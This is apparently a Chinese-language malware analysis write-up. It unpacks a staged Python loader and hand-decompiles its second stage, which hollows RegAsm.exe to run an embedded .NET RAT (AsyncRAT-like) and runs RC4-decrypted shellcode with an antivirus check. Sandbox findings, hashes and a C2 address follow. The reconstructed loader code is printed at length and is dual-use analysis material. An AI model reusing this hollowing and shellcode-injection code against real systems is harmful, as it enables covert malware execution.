總之把 zk.entrypoint 拆出來了
# stage 1 payload
一樣先提取出 stage 1 的 pyc
```python=
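import base64
import dis
import importlib
import marshal
import types
import zlib

# Stage-1 payload as shipped: base85 text -> zlib -> marshalled code object.
# `payload` is the extracted base85 string (not reproduced on this page).
# marshal.loads does not execute anything, but it is not hardened against
# hostile input either -- run this unpacking step on an isolated analysis host.
code_object = marshal.loads(zlib.decompress(base64.b85decode(payload)))
print(code_object)

# Human-readable dump for static review; the bytecode is never executed here.
with open("zk_disassembly.txt", "w", encoding="utf-8") as f:
    if isinstance(code_object, types.CodeType):
        f.write(dis.code_info(code_object))
        f.write("\nDisassembled bytecode:\n")
        dis.dis(code_object, file=f)
    else:
        f.write("Decoded content is not a code object.\n")
        f.write(str(code_object))

# Re-wrap the code object as a timestamp-based .pyc so decompilers can load it.
# _code_to_timestamp_pyc is a private CPython helper; the stdlib has no public
# API that builds a .pyc from an already-marshalled code object.
pyc_data = importlib._bootstrap_external._code_to_timestamp_pyc(code_object)
print(pyc_data)
with open("zk_output.pyc", "wb") as f:
    f.write(pyc_data)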
```
# stage 1 source code
然後使用 sup02.entrypoint 反編譯出的程式來提取出 stage 2
```python=
import os
import json
import base64
import sqlite3
import shutil
import requests
import glob
import re
import zipfile
import io,dis
import datetime
import hmac
import subprocess
import zlib
# from websocket import create_connection
from base64 import b64decode
from hashlib import sha1, pbkdf2_hmac
from pathlib import Path
from pyasn1.codec.der.decoder import decode
from Crypto.Cipher import AES, DES3, PKCS1_OAEP
from Crypto.PublicKey import RSA
# from win32crypt import CryptUnprotectData
# from ctypes import windll, byref, create_unicode_buffer, pointer, WINFUNCTYPE
from ctypes.wintypes import DWORD, WCHAR, UINT
def decompress(code_bytes: bytes) -> bytes:
# zlib layer of the stage-2 envelope; thin wrapper used by hybrid_decrypt.
return zlib.decompress(code_bytes)
def rc4(data, key):
# Textbook RC4: key-scheduling (KSA) over a 256-entry state, then the
# pseudo-random generation loop (PRGA) XORed onto each input byte.
# `data` and `key` are iterated as ints (bytes-like); returns bytes.
# Being pure XOR, the same call both encrypts and decrypts.
S = list(range(256))
j = 0
out = []
# --- KSA: permute S under the repeating key
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = (S[j], S[i])
i = j = 0
# --- PRGA: one keystream byte per input byte
for char in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = (S[j], S[i])
out.append(char ^ S[(S[i] + S[j]) % 256])
return bytes(out)
def aes_decrypt(data, key):
# AES-EAX: the first 16 bytes of `data` are the nonce, the rest is ciphertext.
# Only decrypt() is called (not decrypt_and_verify), so the EAX tag is never
# checked -- the layer gives confidentiality but no integrity.
nonce = data[:16]
ciphertext = data[16:]
cipher = AES.new(key, AES.MODE_EAX, nonce=nonce)
return cipher.decrypt(ciphertext)
def xor(data, key):
# Repeating-key XOR; symmetric, so it also undoes itself.
return bytes([b ^ key[i % len(key)] for i, b in enumerate(data)])
def rsa_decrypt(data, private_key):
# RSA-OAEP unwrap of the per-payload key blob using the private key that
# ships inside the loader itself (see `private_key` below).
rsa_cipher = PKCS1_OAEP.new(RSA.import_key(private_key))
return rsa_cipher.decrypt(data)
def hybrid_decrypt(base85_encoded_data, rsa_private_key):
# Stage-2 envelope as the loader peels it:
#   base85 -> zlib -> [ 256-byte RSA-OAEP key blob | AES-EAX(nonce16 + ct) ]
# The key blob unwraps to 48 bytes laid out as RC4 key, XOR key, AES key
# (16 bytes each); layers are removed in the order AES -> XOR -> RC4.
# A fixed 256-byte wrapped key is consistent with a 2048-bit RSA modulus.
compressed_data = base64.b85decode(base85_encoded_data)
encrypted_data = decompress(compressed_data)
# Fixed-offset split: the wrapped key always occupies the first 256 bytes.
rsa_encrypted_key = encrypted_data[:256]
aes_encrypted = encrypted_data[256:]
combined_key = rsa_decrypt(rsa_encrypted_key, rsa_private_key)
rc4_key = combined_key[:16]
xor_key = combined_key[16:32]
aes_key = combined_key[32:48]
xor_encrypted = aes_decrypt(aes_encrypted, aes_key)
rc4_encrypted = xor(xor_encrypted, xor_key)
decrypted_data = rc4(rc4_encrypted, rc4_key)
return decrypted_data
# RSA private key embedded in the stage-1 loader (base64; elided on this page).
# Shipping the private key next to the payload makes the RSA layer packing /
# obfuscation rather than real confidentiality: anyone with the script can unwrap it.
private_key = base64.b64decode('....')
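def runner(byte_code_data):
    """Statically dump the decrypted stage-2 code object instead of running it.

    Writes a human-readable disassembly to ``zk_disassembly.txt`` and a
    timestamp-based ``zk_stage2.pyc`` that decompilers can load.

    Args:
        byte_code_data: marshalled CPython code object, i.e. the output of
            ``hybrid_decrypt``.

    Returns:
        None. Results are written to the two files named above.
    """
    import importlib
    import marshal
    import types

    # marshal.loads never executes the code object, but it is not hardened
    # against hostile input -- keep this step on an isolated analysis host.
    code_object = marshal.loads(byte_code_data)
    # The original stage-1 loader executed the payload at this point via
    # types.FunctionType(code_object, globals())(); that call is deliberately
    # replaced by the static dump below so analysis never runs stage 2.
    with open("zk_disassembly.txt", "w", encoding="utf-8") as f:
        if isinstance(code_object, types.CodeType):
            f.write(dis.code_info(code_object))
            f.write("\nDisassembled bytecode:\n")
            dis.dis(code_object, file=f)
        else:
            f.write("Decoded content is not a code object.\n")
            f.write(str(code_object))
    # Private CPython helper; the stdlib offers no public way to build a .pyc
    # from an already-marshalled code object.
    pyc_data = importlib._bootstrap_external._code_to_timestamp_pyc(code_object)
    print(pyc_data)
    with open("zk_stage2.pyc", "wb") as f:
        f.write(pyc_data)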
# Stage-2 payload (base85 text, elided on this page) -> decrypt -> static dump.
# `runner` as patched above writes disassembly + .pyc and never executes the code.
code = hybrid_decrypt('#stage 2 payload',private_key)
runner(code)
```
# stage 2 source code
就能得到 stage 2 的 dis code 以及 pyc 了,稍微查看一下程式不多,大概不到 300 行,直接手工反編譯,大概做了四個小時(手工還原的程式碼可能帶有筆誤,以下列表僅供理解流程,不保證可直接執行)
因為 payload 太長就不放了
```python=
import logging
import platform
import sys
import ctypes
from ctypes import FormatError,GetLastError,byref,c_size_t,create_string_buffer,sizeof,windll
from ctypes.wintypes import LPVOID
from ctypes.wintypes import wintypes as wt
import time
import pefile,time
import shutil,base64,subprocess,os
# Best-effort removal of __pycache__ (as transcribed). The bare except swallows
# any error, so a failure here is silent.
try:
shutil.retree('__pycache__')
except:
pass
from definitions import CONTEXT64, PROCESS_INFORMATION, STARTUPINFO, WOW64_CONTEXT
from definitions import CONTEXT_FULL, CREATE_SUSPENDED, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READWRITE, WOW64_CONTEXT_FULL
# 看起來是很裸的 Local Shellcode Loader ---
def rc4(data, key):
# Same RC4 routine as in stage 1 (KSA then PRGA, XOR keystream onto the
# input). Used below both for the embedded PE (`payload`) and for the
# shellcode blob, with the single hard-coded module-level `key`.
S = list(range(256))
j = 0
out = []
# --- KSA: permute S under the repeating key
for i in range(256):
j = (j + S[i] + key[i % len(key)]) % 256
S[i], S[j] = (S[j], S[i])
i = j = 0
# --- PRGA: one keystream byte per input byte
for char in data:
i = (i + 1) % 256
j = (j + S[i]) % 256
S[i], S[j] = (S[j], S[i])
out.append(char ^ S[(S[i] + S[j]) % 256])
return bytes(out)
def killprocessbyid():
# Error-path cleanup: kills the (half-hollowed) host with `taskkill /F`,
# window hidden via CREATE_NO_WINDOW. Reads module-level `pid`.
# NOTE(review): as transcribed this takes no parameter, yet every call site
# below passes `pid` positionally. The bare except turns any failure
# (no such PID, access denied) into a silent None.
try:
return subprocess.run(f'taskkill /F /PID {pid}', creationflags=subprocess.CREATE_NO_WINDOW)
except:
return None
# 抓到 shc_loader 這段是抄別人的
# https://github.com/brosck/Condor/blob/main/template/bypass.py
# 主要用途為 bypass AV 注入 shellcode
def shc_loader(base64_encrypted_shellcode):
# Same-process shellcode runner, adapted from the Condor template linked
# above. Defender view: an RWX allocation (0x3000 = MEM_COMMIT|MEM_RESERVE,
# 0x40 = PAGE_EXECUTE_READWRITE) immediately followed by a thread whose start
# address lies in that unbacked region is the telemetry pattern to alert on.
# --- load the shellcode and decrypt it with RC4 (module-level `key`)
shc_encrypted = base64.b64decode(base64_encrypted_shellcode)
shc = rc4(shc_encrypted, key)
# ---
# --- declare the Win32 API prototypes
kernel32 = ctypes.windll.kernel32
kernel32.VirtualAlloc.argtypes = (wt.LPVOID, wt.c_size_t, wt.DWORD, wt.DWORD)
kernel32.VirtualAlloc.restype = wt.LPVOID
kernel32.CreateRemoteThread.argtypes = (
wt.HANDLE, wt.LPVOID, wt.c_size_t, wt.LPVOID, wt.LPVOID, wt.DWORD, wt.LPVOID
)
kernel32.CreateRemoteThread.restype = wt.HANDLE
kernel32.RtlMoveMemory.argtypes = (wt.LPVOID, wt.LPVOID, wt.c_size_t)
kernel32.RtlMoveMemory.restype = None
kernel32.WaitForSingleObject.argtypes = (wt.HANDLE, wt.DWORD)
kernel32.WaitForSingleObject.restype = wt.DWORD
# ---
try:
# --- call the Win32 APIs: allocate RWX, copy the shellcode in, start a thread on it
buf = shc
memAddr = kernel32.VirtualAlloc(None, len(buf), 0x3000, 0x40)
kernel32.RtlMoveMemory(memAddr, buf, len(buf))
th = kernel32.CreateRemoteThread(
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.c_void_p(memAddr),
ctypes.c_int(0),
ctypes.c_int(0),
ctypes.pointer(ctypes(c_int(0))),
)
# -1 == INFINITE: block until the shellcode thread exits.
kernel32.WaitForSingleObject(th, -1)
# ---
# Any failure inside the try (including the argument list as transcribed)
# is swallowed; the caller gets None either way and no log line is emitted.
except Exception:
return None
# Local Shellcode Loader ---
# --- decrypt shellcode + 建立等一下會用到的結構
# Shellcode blob (base64 over RC4, elided on this page); handed to shc_loader at
# the very end, after the hollowed RAT is already running.
base64_encrypted_shc='# base64_encrypted_shc payload'
USING_64_BIT = platform.architecture()[0] == '64bit'
# Hollowing host: a .NET Framework utility under the Windows directory, chosen so
# the RAT executes under a trusted image name. Defender note: RegAsm.exe created
# CREATE_SUSPENDED by an unrelated parent (presumably the Python interpreter
# running this stage) is the anomaly to hunt for.
TARGET_EXE='C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe'
logger=logging.getLogger(__name__)
# DEBUG-level logging left on from the copied PoC; the literal log strings below
# ("Starting ... in suspended state", "Writing payload sections ...") are
# themselves usable as hunting strings.
logging.basicConfig(
format='[%(asctime)s] %(levelname)s: %(message)s',
level=logging.DEBUG,
datefmt='%Y-%m-%d %H:%M:%S',
)
# Ten more silent attempts to remove __pycache__ (as transcribed); errors are
# swallowed by the bare except.
for i in range(10):
try:
shutil.retree('__pycache__')
except:
pass
# Embedded second-stage PE (identified below as a .NET RAT), base64 over RC4.
payload_base64_encrypted='# payload_base64_encrypted payload' # a RAT exe
payload_data_encrypted=base64.b64decode(payload_base64_encrypted)
# Static RC4 key, shared with shc_loader. Because it is hard-coded, the payload
# can be recovered offline (see the extraction snippet further down the page).
key=b'ditmethangwindowdefender'
payload=rc4(payload_data_encrypted,key)
# STARTUPINFO.cb must hold the structure size before CreateProcess;
# PROCESS_INFORMATION receives the new process/thread handles and ids.
startup_info = STARTUPINFO()
startup_info.cb = sizeof(startup_info)
process_info=PROCESS_INFORMATION()
logger.info(f"Starting {TARGET_EXE} in suspended state")
# ---
# --- create process
# Spawn the host with CREATE_SUSPENDED so its primary thread never reaches the
# legitimate entry point; everything up to ResumeThread below rewrites the image.
if windll.kernel32.CreateProcessA(
None,
create_string_buffer(bytes(TARGET_EXE,'encoding'=ascii)),
None,
None,
False,
CREATE_SUSPENDED,
None,
None,
byref(startup_info),
byref(process_info),
) == 0:
logger.error(f"Error stating {TARGET_EXE}: {FormatError()}{GetLastError()}")
sys.exit(1)
logger.debug(f"PID: {process_info.dwProcessId}")
# `pid` is the module-level value killprocessbyid() reads on every error path.
pid=process_info.dwProcessID
logger.info('Reading payload')
# Parse the decrypted PE in memory; its optional header and section table drive
# every remote write that follows.
pe_payload=pefile.PE(data=payload)
payload_data=payload
if pe_payload.PE_TYPE==pefile.OPTIONAL_HEADER_MAGIC_PE:
logger.debug('is 32-bit')
else:
logger.debug('is 64-bit')
logger.info('Getting thread context')
# Full register context of the suspended primary thread. Rdx (x64) / Ebx (x86)
# is later used as the PEB pointer and Rcx / Eax as the entry point.
context = CONTEXT64() if USING_64_BIT else WOW64_CONTEXT()
context.ContextFlags = CONTEXT_FULL if USING_64_BIT else WOW64_CONTEXT_FULL
if windll.kernel32.GetThreadContext(proess_info,hThread,byref(context))==0:
logger.error(f'Error in GetThreadContext: {FormatError()}{GetLastError()}')
# Unlike the later error branches there is no return here (as transcribed);
# execution falls through after the kill.
killprocessbyid(pid)
# ---
# 準備蓋掉 Create 起來 Process 的 PE Header
logger.info('Reading base address of process image')
target_image_base=LPVOID()
# Reads the host's ImageBaseAddress out of its PEB: Rdx/Ebx holds the PEB at
# thread start and the field sits two pointers in, hence 2 * sizeof(c_size_t).
if windll.kernel32.ReadProcessMemory(
process_info.hProcess,
LPVOID((context.Rdx if USING_64_BIT else context.Ebx) + 2 * sizeof(c_size_t)),
byref(target_image_base),
sizeof(LPVOID),
None
)==0:
logger.error(f'Error in ReadProcessMemory: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
logger.debug(f"Base address of process: {hex(target_image_base.value)}")
# The original image is unmapped only when it collides with the payload's
# preferred ImageBase; otherwise it stays mapped and VirtualAllocEx below is
# still asked for the payload's address. Defender note: NtUnmapViewOfSection
# on a just-created suspended process is a high-fidelity hollowing indicator.
if target_image_base == pe_payload.OPTIONAL_HEADR.ImageBase:
logger.info('Unmapping target executable from the process ')
if windll.ntdll.NtUnmapViewOfSection(process_info.hProcess, target_image_base) == 0:
logger.error(f'Error in NtUnmapViewOfSection: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
# ---
# --- 看起來在嵌入 payload 的 PE header
logger.info('Allocating memory in target process')
# restype assignment as transcribed.
if USING_64_BIT:
LPVOID.restype = windll.kernel32.VirtualAllocEx
# Reserve + commit SizeOfImage bytes at the payload's preferred ImageBase as RWX.
# Defender note: a remote PAGE_EXECUTE_READWRITE allocation followed by
# WriteProcessMemory of PE headers is visible in ETW/EDR process-access telemetry.
allocated_address = windll.kernel32.VirtualAllocEx(
process_info.hProcess,
pe_payload.OPTIONAL_HEADER.ImageBase,
pe_payload.OPTIONAL_HEADER.SizeOfImage,
MEM_COMMIT | MEM_RESERVE,
PAGE_EXECUTE_READWRITE
)
if allocated_address==0:
logger.error(f'Error in VirtualAllocEx: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
logger.debug(f"Allocated memory at {hex(allocated_address)}")
logger.debug(f"Writing payload headers to target process (to {hex(allocated_address)})")
# Copy the first SizeOfHeaders bytes (DOS/NT headers + section table) verbatim.
if windll.kernel32.WriteProcessMemory(
process_info.hProcess,
LPVOID(allocated_address),
payload_data,
pe_payload.OPTIONAL_HEADER.SizeOfHeaders,
None
)==0:
logger.error(f'Error in WriteProcessMemory: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
# ---
# 裸 Process Hollowing 流程
logger.info('Writing payload sections to target process')
# Map each section from its file offset (PointerToRawData) to its in-memory
# VirtualAddress; the slice passes the rest of the buffer and relies on
# SizeOfRawData to bound the write. Nothing here processes relocations, so the
# payload must actually land at its preferred ImageBase.
for section in pe_payload.sections:
section_name=section.Name.decode('utf-8').strip('\x00')
logger.info(f'Writing section {section_name} (to {hex(allocated_address+section.VirtualAddress)})')
if windll.kernel32.WriteProcessMemory(
process_info.hProcess,
LPVOID(allocated_address+section.VirtualAddress),
payload_data[section.PointerToRawData:],
section.SizeOfRawData,
None
)==0:
logger.error(f'Error in WriteProcessMemory: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
logger.info('Setting new entrypoint')
# The initial thread takes its start address from Rcx (x64) / Eax (x86); point
# it at the payload's AddressOfEntryPoint inside the new allocation.
if USING_64_BIT:
context.Rcx=allcoated_address+pe_payload.OPTIONAL_HEADER.AddressOfEntryPoint()
logger.debug(f"New entrypoint: {hex(context.Rcx)}")
else:
context.Eax=allcoated_address+pe_payload.OPTIONAL_HEADER.AddressOfEntryPoint()
logger.debug(f"New entrypoint: {hex(context.Eax)}")
logger.info('Writing base address of payload into the process')
# Overwrite PEB.ImageBaseAddress (same 2-pointer offset as the read above) with
# the payload's own ImageBase field so the loader sees a consistent image.
if windll.kernel32.WriteProcessMemory(
process_info.hProcess,
LPVOID((context.Rdx if USING_64_BIT else context.Ebx) + 2 * sizeof(c_size_t)),
payload_data[pe_payload.OPTIONAL_HEADER.get_filed_absolute_offset("ImageBase"):],
sizeof(LPVOID),
None
)==0:
logger.error(f'Error in WriteProcessMemory: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
# ---
logger.info('Setting modified context')
# Commit the patched register context, then let the thread run: from here the
# RegAsm.exe process executes the RAT. SetThreadContext + ResumeThread on a
# suspended child round off the canonical hollowing sequence for detection.
if windll.kernel32.SetThreadContext(process_info.hThread,byref(context))==0:
logger.error(f'Error in SetThreadContext: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
# --- execute the shellcode at exe entrypoint
logger.info('Resuming context')
if windll.kernel32.ResumeThread(process_info.hThread)==0:
logger.error(f'Error in ResumeThread: {FormatError()}{GetLastError()}')
killprocessbyid(pid)
return
# ---
# AV check runs only AFTER the hollowed RAT is already live; finding Avast
# processes merely skips the shellcode stage. `tasklist` spawned hidden from the
# interpreter is itself a telemetry hook.
result = subprocess.run(['tasklist'], stdout=subprocess.PIPE, text=True, creationflags=subprocess.CREATE_NO_WINDOW)
process_list=result.stdout
if 'AvastUI.exe' in process_list or 'wsc_proxy.exe' in process_list:
sys.exit()
print('Delay for shcloader ... ')
# 20 s pause before the second stage; consistent with sandbox-timeout evasion,
# though the code itself gives no reason (inferred).
time.sleep(20)
# Top-level `return` (as transcribed) shows this run was a function body in the
# original; the tuple's second element is always None.
return shc_loader(base64_encrypted_shc),None
```
不熟 windows API,但應該是做一些 process injection
~~**<p style="font-size: 50px;">等 RED 幫我翻譯</p>**~~
> 看完ㄌ, 看起來 shc_loader 只是在做 local shellcode loader, 下面比較特別的是看起來他把 create 的 exe 上半部整個嵌入成自己的 exe, 說是 Process Hollowing 但又不完全是, 不過確實是有趣ㄉ野外技術 @Red
> >補 他甚至會偵測有沒有防毒在執行中, 如果有的話就退出 超好笑 會怕
> 感謝 Red 的光速翻譯
> 這份程式看起來是有兩個獨立的部分,process hollowing 以及 bypass AV
抓到使用的 source code,[HollowProcess/process-hollowing.py at main · joren485/HollowProcess](https://github.com/joren485/HollowProcess/blob/main/process-hollowing.py)
```python=
import base64

# Offline recovery of the embedded PE: undo base64, then RC4 with the
# hard-coded key lifted from stage 2 (`rc4` and `payload_base64_encrypted`
# come from the stage-2 listing above).
key = b'ditmethangwindowdefender'
payload_data_encrypted = base64.b64decode(payload_base64_encrypted)
payload = rc4(payload_data_encrypted, key)

# Echo the raw bytes (the leading MZ header is the quick sanity check), then
# dump the sample for PE tooling. Do this only on an isolated analysis host --
# the .exe extension means a stray double-click runs a live RAT; a neutral
# extension such as .bin avoids that.
print(payload)
with open('payload.exe', 'wb') as out_file:
    out_file.write(payload)
```
將 payload_base64_encrypted 解密後可以看到是一個 exe 檔案
`b'MZ\x90\x00\x03\x00\x00\x00\x04\`
`payload.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows`
最後找出這隻 Wmuxwilb.exe
---
base64_encrypted_shc 也照上面的方式匯出,再使用 cyberchef 轉成 asm

找到此網站可以使用 AI 將 asm 轉換成 C
~~雖然結果沒什麼用~~
https://app.codeconvert.ai/code-converter

https://www.virustotal.com/gui/file/d2eef30bb17f05174b1bab290704c719a8766c3c7a990c4d65c006fb8090e41a
## 分析
可以找到 stage 2 的程式使用了兩個 github 專案,分別為 bypass AV 以及 process hollowing,且兩者似乎為獨立運作,不會影響彼此。
https://blog.csdn.net/qq_63701832/article/details/133968257
https://www.cnblogs.com/haidragon/p/16843483.html
https://mp.weixin.qq.com/s/LkOmSNw7YgD7yfXkIrofHQ
https://breachtactics.com/blog/pythonic-malware/
process hollowing 使用 [HollowProcess/process-hollowing.py at main · joren485/HollowProcess](https://github.com/joren485/HollowProcess/blob/main/process-hollowing.py)
因為 stage 2 中的 payload_base64_encrypted 本身就是 exe,所以會直接將 Wmuxwilb.exe 在記憶體內載入,且 Wmuxwilb.exe 是一隻 RAT
bypass AV 使用 https://github.com/brosck/Condor/blob/main/template/bypass.py
會直接注入 shellcode
# Wmuxwilb.exe
[VirusTotal - File - 6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec](https://www.virustotal.com/gui/file/6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec)
[Malware analysis payload.exe Malicious activity | ANY.RUN - Malware Sandbox Online](https://any.run/report/6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec/97000e1a-5d69-41bf-b874-517b1be99ee6?_gl=1*b0d12j*_ga*MTAzNDgwNjIwMC4xNzM3MzY5NDE0*_ga_53KB74YDZR*MTczNzM2OTQxMy4xLjEuMTczNzM3MjI5Mi4wLjAuNjgwNzI1NzA4*_gcl_au*NDc5NDI5MTg4LjE3MzczNzE4MDU.*FPAU*NDc5NDI5MTg4LjE3MzczNzE4MDU.)
[6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec | Triage](https://tria.ge/250120-mltjhsvlex/behavioral1)
https://www.joesandbox.com/analysis/1599284/0/executive
## VirusTotal
38/72
Popular threat label: trojan.lazy/msil
Threat categories: trojan/dropper
Family labels: lazy/msil
MD5: 9a2785ed0bfca61e66d1ca25d9b87891
SHA-1: 3cdaefdb8b864365c0eb5a39bfccfb599b0b6376
SHA-256: 6dcf1468a9ee9d100ac91bfc0a66a302a55f67711f5f01e55b8eb2561f6a58ec
Library: .NET (v4.0.30319)


在 IP Traffic 可以看到 `TCP 38.180.225.150:56001` 連線,但無法找到有判斷為惡意的資訊
[VirusTotal - IP address - 20.99.186.246](https://www.virustotal.com/gui/ip-address/20.99.186.246) 被標記為 APT27 所使用的 IP
在 Memory Pattern Urls 可以看到以下網址:
1. https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
2. https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
3. https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
4. https://stackoverflow.com/q/11564914/23354;
5. https://stackoverflow.com/q/14436606/23354
6. https://stackoverflow.com/q/2152978/23354rCannot

似乎有執行 IsDebuggerPresent,進行簡單的 anti-debug
值得注意的是看起來有搜尋防毒軟體 `IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct`
使用 DFfe9ewf 搜尋,可以找到幾篇 sandbox report
1. [Automated Malware Analysis - Joe Sandbox Cloud Basic](https://www.joesandbox.com/analysis/1549304)
- 連線到 162.230.48.189
- https://github.com/mgravell/protobuf-net
- 同樣出現的 URL
- https://stackoverflow.com/q/14436606/23354
- https://github.com/DFfe9ewf/test3/....
- http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
- https://stackoverflow.com/q/2152978/23354rCannot
- https://stackoverflow.com/q/11564914/23354;
- https://stackoverflow.com/q/2152978/23354
- Dropped file
- C:\Users\user\AppData\Local\Temp\k9RDtLDQqgan.bat
- sha1: 88E812D9C5C66D063998D3C1FA62DBE7940D6993
- C:\Users\user\AppData\Roaming\CanRead.exe
- sha1: A25DFF3C86AA7FEFDDB8B9173B64F5F87F398EA3
- C:\Users\user\AppData\Roaming\IDEKCRY.exe
- sha1: A25DFF3C86AA7FEFDDB8B9173B64F5F87F398EA3
3. [Automated Malware Analysis - Joe Sandbox Cloud Basic](https://www.joesandbox.com/analysis/1550698)
- 連線到 162.230.48.189
- http://162.230.48.189:56007/ready
- https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
- https://github.com/mgravell/protobuf-netJ
- 同樣出現的 URL
- https://stackoverflow.com/q/14436606/23354
- https://github.com/DFfe9ewf/test3/....
- http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
- https://stackoverflow.com/q/2152978/23354rCannot
- https://stackoverflow.com/q/11564914/23354;
- https://stackoverflow.com/q/2152978/23354
- Dropped file
- C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.vbs
- sha1: 2074D1B21484CC8DA2D27C6BCFB05311C4EDC812
- C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeId.vbs
- sha1: 80F6C546C47594600FA09415F4EF69E7B2D19562
- C:\Users\user\AppData\Roaming\System.vbs
- sha1: 2074D1B21484CC8DA2D27C6BCFB05311C4EDC812
- C:\Users\user\AppData\Roaming\TypeId.exe
- sha1: E0E338A9ABC098C267B8E45BEFC54816F7358E90
- C:\Users\user\AppData\Roaming\worn.vbs
- sha1: 2074D1B21484CC8DA2D27C6BCFB05311C4EDC812
5. [Report - raw.githubusercontent.com/DFfe9ewf/test3/refs/heads/main/chromedriver.exe](https://urlquery.net/report/7d48cf66-e8b4-4ccd-a34e-ec9a8f1be831)
- YARAhub by abuse.ch | malware | pe_detect_tls_callbacks
7. [Report - raw.githubusercontent.com/DFfe9ewf/test3/refs/heads/main/msedgedriver.exe](https://urlquery.net/report/9d412421-85bb-455b-a952-640702c36c9a)
- YARAhub by abuse.ch | malware | pe_detect_tls_callbacks
## ANY.RUN


在這也一樣判斷出此IP會進行
Domain Observed Used for C2 Detected: ET MALWARE Generic AsyncRAT Style SSL Cert
以及
Malware Command and Control Activity Detected:
REMOTE [ANY.RUN] AsyncRAT Successful Connection

並嘗試進行資料偷取,包含如下檔案
1. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded
2. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.6.5.0
3. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.6.5.0\_metadata
4. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\OriginTrials\0.0.1.4
5. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache
6. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache
7. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache
8. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\FirstPartySetsPreloaded\2024.6.5.0
9. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\hyphen-data
10. C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\PKIMetadata\13.0.0.0
似乎偵測到 [PUREHVNC](https://www.freebuf.com/news/408455.html) has been detected (YARA),但沒有完整資料
[ASYNCRAT](https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp) has been detected (SURICATA)

## Tria.ge
特徵:
1. Reads user/profile data of web browsers
2. System Location Discovery: System Language Discovery
3. Suspicious use of AdjustPrivilegeToken
查看封包可以看到對 38.180.225.150:56001 的連線使用 tls 加密

# shellcode
存成 bin 檔案並使用 ida 打開


看到 dll 字串
# IoC
C2: 38.180.225.150:56001